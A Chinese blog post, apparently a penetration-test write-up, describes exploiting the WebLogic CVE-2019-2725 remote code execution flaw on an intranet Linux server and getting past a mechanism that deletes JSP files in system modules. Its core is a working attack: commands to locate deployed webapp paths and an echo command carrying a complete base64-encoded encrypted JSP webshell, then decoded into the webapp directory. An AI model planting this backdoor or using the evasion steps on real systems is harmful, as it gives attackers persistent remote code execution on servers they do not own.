从RCE到隔离内网(二)

在上次经历过一次借助CVE-2019-2725 RCE拿到webshell之后,又碰到了一例,依然是一个纯内网机,区别在于本次目标服务器为Linux系统,且系统环境堪称诡异,作为一台linux居然存在某种防护机制,会删除写入的jsp文件,但又不像杀毒软件的内容检测机制,txt并不会被清除,然而会在重命名为jsp时被清除。

因为这个端口是扫到的,所以预先并不知道其web应用的存在,刚开始也没有想过要去找web应用,直接借助网上公开的exp开始利用,写入webshell,但是正如上面提到的某种防护机制,木马文件被清除了。这里exp的webshell直接写入到bea_wls_internal模块下,后来我们又手动往我们所熟悉的uddiexplorer模块下写shell,发现同样被清除。

在老大的指导下,发现web应用写入的shell居然没有被清除!这个机制确实诡异,难道系统模块才会被实时检测?我们刚开始只是认为是不是需要重启weblogic生效,后来发现目标路径下确实没有我们的文件,这里关于web应用的获取便成了一个很细节的一环。

webapp名称获取

个人理解两种思路:

  • 1、路径猜解,其实昨天字典给力,确实被我猜到了,但是那个web应用有点小问题,而且也没考虑到web应用路径和系统模块路径会被区别对待,所以没有继续尝试。
    再枚举到web应用名称后,即可find检索:
find /weblogic -name 'XXXX' -type d
  • 2、路径列出,当然这个需要对weblogic路径相对敏感,然后借助RCE直接获取当前部署的web应用名称。
ls /weblogic/user_projects/domains/XXXX/servers/XX/tmp/_WL_user

在正式开始之前,还要提一点,网上傻瓜式的exp确实好用,但只适用于windows,在Linux环境下,它的命令无法读取组合命令,如dir /tmp,它只执行了dir,所以这里强烈案例借助burp重放post包的方式进行RCE。

写入webshell

还是熟悉的套路,webshell bash64加密:


将加密后的payload写入到web应用路径下(txt):

echo PCVAcGFnZSBpbXBvcnQ9ImphdmEudXRpbC4qLGphdmF4LmNyeXB0by4qLGphdmF4LmNyeXB0by5zcGVjLioiJT48JSFjbGFzcyBVIGV4dGVuZHMgQ2xhc3NMb2FkZXJ7VShDbGFzc0xvYWRlciBjKXtzdXBlcihjKTt9cHVibGljIENsYXNzIGcoYnl0ZSBbXWIpe3JldHVybiBzdXBlci5kZWZpbmVDbGFzcyhiLDAsYi5sZW5ndGgpO319JT48JWlmKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwYXNzIikhPW51bGwpe1N0cmluZyBrPSgiIitVVUlELnJhbmRvbVVVSUQoKSkucmVwbGFjZSgiLSIsIiIpLnN1YnN0cmluZygxNik7c2Vzc2lvbi5wdXRWYWx1ZSgidSIsayk7b3V0LnByaW50KGspO3JldHVybjt9Q2lwaGVyIGM9Q2lwaGVyLmdldEluc3RhbmNlKCJBRVMiKTtjLmluaXQoMixuZXcgU2VjcmV0S2V5U3BlYygoc2Vzc2lvbi5nZXRWYWx1ZSgidSIpKyIiKS5nZXRCeXRlcygpLCJBRVMiKSk7bmV3IFUodGhpcy5nZXRDbGFzcygpLmdldENsYXNzTG9hZGVyKCkpLmcoYy5kb0ZpbmFsKG5ldyBzdW4ubWlzYy5CQVNFNjREZWNvZGVyKCkuZGVjb2RlQnVmZmVyKHJlcXVlc3QuZ2V0UmVhZGVyKCkucmVhZExpbmUoKSkpKS5uZXdJbnN0YW5jZSgpLmVxdWFscyhwYWdlQ29udGV4dCk7JT4= >/weblogic/user_projects/domains/XXXX/servers/XX/tmp/_WL_user/cmss/odtlyx/war/jsp/rabbit.txt

对txt中的payload进行base64解码:

base64 -d /weblogic/user_projects/domains/XXXX/servers/XX/tmp/_WL_user/cmss/odtlyx/war/jsp/rabbit.txt >/weblogic/user_projects/domains/XXXX/servers/XX/tmp/_WL_user/cmss/odtlyx/war/jsp/rabbit.jsp

总结

修复建议参考从RCE到隔离内网(一)。

说实话,本文写出来并不好看,但鬼晓得我们一群人在这上面绕了多久,假想了一个杀毒软件,分析进程到现在也没搞清楚是什么防护机制,没想到会存在一个区别对待的机制,也没想到走要去走webapp的方向,我很难说今天碰到的不是一个特例,但谁又能保证下一个不是特例呢?

一句话思路概括:如果遇到系统模块无法写入shell的情况,试着去找下webapp地址与路径吧。

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 158,847评论 4 362
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 67,208评论 1 292
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 108,587评论 0 243
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 43,942评论 0 205
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 52,332评论 3 287
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 40,587评论 1 218
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 31,853评论 2 312
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 30,568评论 0 198
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 34,273评论 1 242
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 30,542评论 2 246
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 32,033评论 1 260
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 28,373评论 2 253
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 33,031评论 3 236
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 26,073评论 0 8
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 26,830评论 0 195
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 35,628评论 2 274
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 35,537评论 2 269